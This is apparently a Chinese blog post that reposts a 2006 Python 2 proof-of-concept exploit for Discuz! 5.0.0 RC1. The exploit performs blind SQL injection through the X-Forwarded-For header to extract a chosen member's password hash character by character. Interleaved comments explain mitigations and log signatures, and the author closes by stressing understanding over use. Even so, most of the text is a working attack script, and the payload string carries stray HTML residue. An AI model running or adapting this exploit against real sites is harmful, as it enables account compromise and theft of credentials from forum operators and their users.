关于Discuz! 5.0.0 RC1的PoC
这里把网上公布的code也贴出来:
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006
import sys
import httplib
from urlparse import urlparse
from time import sleep
def injection (lenthofpass, realurl, path):
# Blind, boolean-based SQL injection loop (Python 2 code: print statements,
# httplib, urlparse module). Recovers the password hash of the member whose
# uid is sys.argv[2] one character at a time, one HTTP request per guess.
#
# lenthofpass -- number of hash characters to recover (main() passes 32).
# realurl     -- urlparse() tuple of the target; only realurl[1] (host[:port])
#                is used here.
# path        -- base path of the forum; 'logging.php' is appended to it.
#
# Returns nothing; writes recovered characters to stdout and calls
# sys.exit(1) as soon as one response does not look vulnerable.
#
# Defender's view: the injected SQL travels in the X-Forwarded-For request
# header (see the header dict below), i.e. the vulnerable code trusted a
# client-controlled header as the visitor's IP address and concatenated it
# into a query. The oracle is the application's own SQL error text echoed in
# the HTTP response. Two independent mitigations therefore apply: treat the
# header as untrusted input (accept only an IP literal / use parameterized
# queries), and stop echoing database errors to the client. In web server
# logs, SQL keywords inside X-Forwarded-For on logging.php?action=login
# requests, repeated dozens of times from one client, are the signature.
sys.stdout.write('[+] The uid=' + sys.argv[2] + ' password hash is: ')
# Position in the hash being recovered, 1-based as in SQL substring().
for num in range(1,lenthofpass+1):
# Candidate byte values: 'a'-'z' (97..122) followed by '0'-'9' (48..57) --
# a superset of the lowercase hex alphabet, consistent with the fixed
# length of 32 used by main(). 36 candidates per position at most.
ran = range(97, 123)
for a in range(48, 58): ran.append(a)
for i in ran:
# Payload: a UNION SELECT whose WHERE clause is true only when the num-th
# character of the stored password has ASCII code i. The leading '</span>'
# is almost certainly HTML residue from the page this was copied from, not
# part of the original string (the original token is not recoverable here).
query = '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
# Headers mimic an IE6 browser; the SQL payload is the X-Forwarded-For
# value. The Cookie carries a fixed cdb_sid, so every request reuses the
# same session identifier -- another per-client constant visible in logs.
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
# Fixed login form body with dummy credentials and a hard-coded formhash.
# The login itself presumably does not need to succeed; the request only
# has to reach the code path that reads X-Forwarded-For.
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
# One POST per candidate; the whole response body is read so the error
# text can be inspected.
http = httplib.HTTPConnection(realurl[1])
http.request("POST", path + "logging.php?action=login&",data , header)
#sleep(1)
response = http.getresponse()
re1 = response.read()
# If 'SELECT' never appears in the response the query text is not being
# echoed, so the oracle is unavailable. The script treats this as "not
# vulnerable" and exits, although it could equally mean verbose database
# errors are disabled -- which is exactly why suppressing them matters.
if re1.find('SELECT') == -1:
print '\n[-] Unvulnerable host'
print '[-] Exit..'
sys.exit(1);
# 'ip3' is presumably a token of the error message that disappears when
# the injected condition is true; its absence is taken as "candidate i is
# the correct character", which is printed and the next position begins.
elif re1.find('ip3') == -1:
sys.stdout.write(chr(i))
http.close()
#sleep(1)
break
#print re1
#print '-----------------------------------------------'
# Candidate did not match: release the connection before the next guess.
http.close()
#sleep(1)
sys.stdout.write('\n')
def main ():
# Entry point: parses <url> <uid> from argv and runs the per-character
# loop. Python 2 syntax (print statements). Exits with status 0 on bad
# usage; the uid is not validated here and is read again from sys.argv[2]
# inside injection().
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'
if len(sys.argv) == 3:
# urlparse() returns a 6-tuple: url[1] is host[:port], url[2] the path.
url = urlparse(sys.argv[1])
# NOTE: url[2:-1] slices the tuple (elements 2..4), not the last character
# of the path, so this comparison with '/' is always true and a '/' is
# always appended; a URL already ending in '/' gets a doubled slash.
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)
# Number of hash characters to recover; fixed at 32.
lenth = 32
print '[+] Connect %s' % url[1]
print '[+] Trying'
print '[+] Plz wait a long long time'
# Noisy by construction: up to 36 POSTs to logging.php per recovered
# character, all from one client with the same cookie -- easy to spot in
# access logs and a natural rate-limiting / WAF trigger.
injection(lenth, url, u)
print '[+] Finished'
# Run main() only when executed as a script, not on import.
if __name__ == '__main__': main()
btw: 我一直认为，0day 不是最重要的，重要的是懂得其中的原理。
我写的这个 Code 就像 PoC 的字面意思一样，只不过是个证明而已，所以也没必要写成最优代码。这个 code 我只在本地测试过，远程测试不成功是很正常的。当然，如果懂了原理，写个能用的 exploit 还是很方便的；否则连为什么不成功都不清不楚，也只有郁闷着了。